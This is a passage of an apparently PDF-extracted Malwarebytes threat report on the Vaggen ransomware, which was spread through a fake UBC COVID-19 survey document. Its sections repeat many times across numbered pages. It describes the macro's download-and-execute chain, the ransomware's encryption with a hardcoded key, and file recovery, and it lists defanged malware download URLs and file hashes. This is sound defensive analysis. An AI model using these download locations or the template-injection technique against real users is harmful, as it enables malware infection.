12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2625 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2626 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2627 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2628 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2629 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2630 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2631 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2632 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2633 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2634 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2635 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2636 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2637 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2638 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2639 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2640 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2641 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2642 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2643 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2644 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2645 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2646 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2647 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2648 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2649 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2650 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2651 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2652 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2653 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2654 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2655 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2656 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2657 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2658 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2659 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf 